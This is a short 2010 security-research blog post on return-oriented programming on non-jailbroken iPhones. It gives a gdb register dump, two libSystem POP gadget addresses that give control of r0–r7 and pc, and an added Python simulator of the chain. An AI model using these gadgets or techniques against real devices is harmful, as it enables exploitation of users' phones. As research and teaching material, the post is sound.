27-May-2010 [11:39] -- Learning ROP on iPhone (ARM)
Some little research on iPhone (non-jailbroken) security and ROP (return oriented programming) this weekend... did not go so far but promises a lot...
Right now I'm controlling most of the interesting registers, including pc, with just two chained ARM gadgets:
(gdb) info reg r0 r1 r2 r3 r4 r5 r6 r7 pc
r0 0x10 16
r1 0x11111111 286331153
r2 0x22222222 572662306
r3 0x33333333 858993459
r4 0x44444444 1145324612
r5 0x55555555 1431655765
r6 0x66666666 1717986918
r7 0x77777777 2004318071
pc 0xdeadbeee -559038738
(gdb)
Gadgets are (the first one borrowed from the zynamics blog post; thx guys :)
0x32988d5e - libSystem+000c7d5e - pop {r0, r1, r2, r3, pc}
0x3298cdf6 - libSystem+000cbdf6 - pop {r4, r5, r6, r7, pc}
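To make the register dump above reproducible, here is an added example (not from the original post) that decodes the two 16-bit Thumb POP encodings and replays them over a little-endian stack image, tracking how each popped word lands in r0..r7 or pc and how bit 0 of a value loaded into pc (the Thumb interworking bit) is stripped, which is why a pushed 0xdeadbeef shows up in gdb as pc = 0xdeadbeee. The gadget addresses are the ones listed above; the POP encodings are derived from the instruction text, and the stack contents and the assumption that the chain pushes odd (Thumb) addresses are constructed for the illustration.

```python
import struct

# Thumb-1 POP encoding (16-bit): 1011 110 P rrrrrrrr
#   bits 0-7 select r0..r7, bit 8 (P) additionally pops pc.
POP_MASK, POP_VALUE = 0xFE00, 0xBC00


def decode_thumb_pop(halfword):
    """Return the registers a 16-bit Thumb POP writes, in pop order, or None."""
    if halfword & POP_MASK != POP_VALUE:
        return None
    regs = [f"r{i}" for i in range(8) if halfword & (1 << i)]
    if halfword & 0x100:
        regs.append("pc")
    return regs


def encode_thumb_pop(regs):
    """Inverse of decode_thumb_pop; used to build the gadget table from the post's text."""
    enc = POP_VALUE
    for r in regs:
        enc |= 0x100 if r == "pc" else 1 << int(r[1:])
    return enc


# Addresses from the post; encodings derived from the listed instructions
# (pop {r0-r3,pc} -> 0xBD0F, pop {r4-r7,pc} -> 0xBDF0).
GADGETS = {
    0x32988D5E: encode_thumb_pop(["r0", "r1", "r2", "r3", "pc"]),
    0x3298CDF6: encode_thumb_pop(["r4", "r5", "r6", "r7", "pc"]),
}


def build_stack_image(words):
    """Pack 32-bit words little-endian, as they would sit on an ARM stack."""
    return b"".join(struct.pack("<I", w) for w in words)


# Constructed stack contents that reproduce the register dump in the post.
CHAIN = [
    0x10, 0x11111111, 0x22222222, 0x33333333,        # r0..r3
    0x3298CDF6 | 1,                                  # pc -> second gadget (Thumb bit set)
    0x44444444, 0x55555555, 0x66666666, 0x77777777,  # r4..r7
    0xDEADBEEF,                                      # final pc
]


def run_pop_chain(stack_image, gadgets, entry, max_steps=16):
    """Replay POP gadgets over a stack image starting at address `entry`.

    Bit 0 of any value loaded into pc is the interworking bit: it is cleared
    from pc and recorded in `thumb`. Returns (regs, thumb, words_consumed).
    """
    regs = {f"r{i}": 0 for i in range(8)}
    thumb = bool(entry & 1)
    regs["pc"] = entry & ~1
    sp = 0
    for _ in range(max_steps):
        popped = decode_thumb_pop(gadgets.get(regs["pc"], 0))
        if popped is None:            # pc left the known gadget set: chain ended
            break
        for r in popped:
            if sp + 4 > len(stack_image):
                raise ValueError("stack image exhausted mid-gadget")
            (val,) = struct.unpack_from("<I", stack_image, sp)
            sp += 4
            if r == "pc":
                thumb, val = bool(val & 1), val & ~1
            regs[r] = val
        if "pc" not in popped:        # a POP without pc falls through, it does not chain
            break
    return regs, thumb, sp // 4


if __name__ == "__main__":
    regs, thumb, used = run_pop_chain(build_stack_image(CHAIN), GADGETS, 0x32988D5E | 1)
    for name, val in regs.items():
        print(f"{name:<3} {val:#010x}")
    print(f"thumb={thumb} words_consumed={used}")
```

Running it prints the same r0..r7 values as the gdb dump and pc = 0xdeadbeee with the Thumb flag set, after consuming exactly ten stack words: four for the first gadget's data registers, one for the second gadget's address, four more data registers, and the final pc.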
Now onto some more interesting gadgets to call functions and chain them...
Fermin J. Serna - @fjserna